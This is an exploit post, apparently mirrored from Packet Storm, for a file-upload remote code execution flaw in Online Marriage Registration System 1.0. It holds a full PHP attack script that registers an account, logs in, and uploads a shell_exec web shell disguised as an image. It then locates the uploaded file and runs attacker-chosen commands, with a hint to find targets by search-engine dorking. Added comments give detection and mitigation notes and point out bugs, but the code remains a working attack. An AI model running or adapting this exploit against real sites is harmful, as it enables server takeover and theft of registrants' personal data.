## https://sploitus.com/exploit?id=PACKETSTORM:181416
=============================================================================================================================================  
| # Title : Online Marriage Registration System 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engines.  
  
[+] This payload inject php code contains a back door.  
  
[+] Line 16 + 19 Set your Target.  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php -u http://127.0.0.1/omrs/ -c dir  
  
[+] payload :  
  
<?php  
// Parse command line arguments.
// -u  base URL of the target installation (required)
// -c  command string handed to the uploaded script (required)
// -m  mobile number used as the account login (optional)
// -p  account password (optional; defaults to 'inouvis2022' here -- note
//     that the second default applied later in this file is spelled
//     'inouvis-2022', with a dash)
$options = getopt("u:c:m:p:");
$url = $options['u'] ?? null;
$command = $options['c'] ?? null;
$mobile = $options['m'] ?? null;
$password = $options['p'] ?? 'inouvis2022';

// Only the URL and the command are mandatory; -m/-p may be omitted.
if (!$url || !$command) {
    die("Usage: php script.php -u <url> -c <command> \n");
}
  
/**
 * Authenticates against the application's user login endpoint.
 *
 * Sends a form POST of mobno/password/login to {$url}/user/login.php and
 * lets curl persist the response cookies into cookie.txt in the current
 * working directory. The later request in upload() reuses that file via
 * CURLOPT_COOKIEFILE rather than the value returned here.
 *
 * Detection: a POST to /user/login.php from a client that has just hit
 * /user/signup.php, followed by a multipart POST to
 * /user/marriage-reg-form.php, is the request sequence this script emits.
 *
 * @param string $url      base URL of the installation
 * @param string $mobile   mobile number used as the login name
 * @param string $password account password
 * @return string|null first PHPSESSID value matched in cookie.txt, or null
 *                     when the pattern does not match
 */
function login($url, $mobile, $password) {
    $loginUrl = "{$url}/user/login.php";

    $ch = curl_init($loginUrl);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'mobno' => $mobile,
        'password' => $password,
        'login' => ''
    ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    // Response cookies are flushed to cookie.txt when the handle is closed.
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
    // Return value of curl_exec (response or false) is discarded.
    curl_exec($ch);
    curl_close($ch);

    // Extract PHPSESSID from cookie file.
    // NOTE(review): curl writes the jar in Netscape (tab-separated) format,
    // so a "PHPSESSID=...;" pattern is unlikely to match it; nothing in this
    // script depends on the returned value, because upload() reads
    // cookie.txt directly.
    $cookies = file_get_contents('cookie.txt');
    preg_match('/PHPSESSID=(\w+);/', $cookies, $matches);
    return $matches[1] ?? null;
}
  
/**
 * Submits the marriage registration form with a PHP file in the 'husimage'
 * image slot.
 *
 * This is the step that exercises the reported weakness: the form handler
 * at {$url}/user/marriage-reg-form.php is expected to store the 'husimage'
 * part even though it is named with a .php extension and declared as
 * application/x-php. Application-side mitigation is a server-side
 * allowlist of image extensions, a MIME check derived from file content
 * rather than the client-declared type, and storing uploads in a location
 * where the web server does not execute scripts.
 *
 * The $cookie parameter is accepted but never read; the session is carried
 * by cookie.txt through CURLOPT_COOKIEFILE.
 *
 * Detection: multipart POST to /user/marriage-reg-form.php whose 'husimage'
 * filename ends in .php or whose declared part type is application/x-php.
 *
 * @param string      $url    base URL of the installation
 * @param string|null $cookie unused
 */
function upload($url, $cookie) {
    $uploadUrl = "{$url}/user/marriage-reg-form.php";

    // Two file parts: 'husimage' carries the script, 'wifeimage' a
    // placeholder JPEG. Both name files in the current working directory.
    $fileData = [
        'husimage' => curl_file_create('shell.php', 'application/x-php', '<?php $command = shell_exec($_REQUEST["cmd"]); echo $command; ?>'),
        'wifeimage' => curl_file_create('test.jpg', 'image/jpeg')
    ];

    $ch = curl_init($uploadUrl);
    curl_setopt($ch, CURLOPT_POST, true);
    // Passing an array (not a query string) makes curl send multipart/form-data.
    curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData);
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // The response is not inspected, so success is assumed unconditionally.
    curl_exec($ch);
    curl_close($ch);

    echo "[+] PHP shell uploaded\n";
}
  
/**
 * Collects numeric .php file names visible at the application root.
 *
 * Fetches {$url}/ and matches every token of the form \d{10,42}\.php in
 * the body. This only yields anything when the root URL exposes such
 * names (for instance through a directory listing); disabling directory
 * indexes on the web server removes this enumeration path. Note that the
 * names are gathered from the root while execCommand() requests them
 * under /user/.
 *
 * @param string $url base URL of the installation
 * @return array<int, string> matched names, possibly empty; a false
 *                            return from curl_exec is not checked first
 */
function getRemotePhpFiles($url) {
    $filesUrl = "{$url}/";
    $ch = curl_init($filesUrl);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);

    // $matches[0] holds the full matches, in document order.
    preg_match_all('/\d{10,42}\.php/', $response, $matches);
    return $matches[0];
}
  
/**
 * Requests the uploaded script with the command in the cmd query parameter
 * and prints the response body.
 *
 * Detection: GET requests to /user/<digits>.php carrying a cmd= parameter.
 * The uploaded script (see upload()) reads $_REQUEST["cmd"] and passes it
 * to shell_exec, so the command runs as the web server user -- which is
 * why uploads must never be served from a script-executing directory.
 *
 * @param string $url      base URL of the installation
 * @param string $webshell file name of the uploaded script under /user/
 * @param string $command  command string, URL-encoded before sending
 */
function execCommand($url, $webshell, $command) {
    $commandUrl = "{$url}/user/{$webshell}?cmd=" . urlencode($command);
    $ch = curl_init($commandUrl);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // $output is the raw response body, or false when the request failed.
    $output = curl_exec($ch);
    curl_close($ch);

    echo "[+] Command output\n" . $output . "\n";
}
  
/**
 * Creates a user account through the public signup form.
 *
 * POSTs the fixed value 'indoushka' for fname/lname/address together with
 * the supplied mobile number and password to {$url}/user/signup.php. Those
 * fixed field values are a usable fingerprint of this script in access or
 * application logs. The parameter order (mobile, password, url) differs
 * from the other helpers in this file, which take $url first.
 *
 * @param string $mobile   mobile number to register as the login name
 * @param string $password password for the new account
 * @param string $url      base URL of the installation
 */
function register($mobile, $password, $url) {
    $signupUrl = "{$url}/user/signup.php";

    $ch = curl_init($signupUrl);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'fname' => 'indoushka',
        'lname' => 'indoushka',
        'mobno' => $mobile,
        'address' => 'indoushka',
        'password' => $password,
        'submit' => ''
    ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // The response is discarded; the success message below is unconditional.
    curl_exec($ch);
    curl_close($ch);

    echo "[+] Registered with mobile phone $mobile and password '$password'\n";
}
  
// Fall back to a random 9-digit mobile number when -m was not given.
$mobile = $mobile ?? strval(rand(100000000, 999999999));
// NOTE(review): $password was already defaulted to 'inouvis2022' (no dash)
// when the options were parsed, so this ?? never applies.
$password = $password ?? 'inouvis-2022';

// Given the defaults above, $mobile is never null here and $password only
// equals 'inouvis-2022' when that exact value was passed with -p, so the
// account creation below is effectively opt-in.
if ($password === 'inouvis-2022' || $mobile === null) {
    register($mobile, $password, $url);
}

// Sequence: log in, snapshot the numeric .php names visible at the root,
// submit the upload, snapshot again, take the difference as the uploaded
// script's name, then request it with the command.
$cookie = login($url, $mobile, $password);
$initialPhpFiles = getRemotePhpFiles($url);
upload($url, $cookie);
$finalPhpFiles = getRemotePhpFiles($url);
$webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0];
execCommand($url, $webshell, $command);
?>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================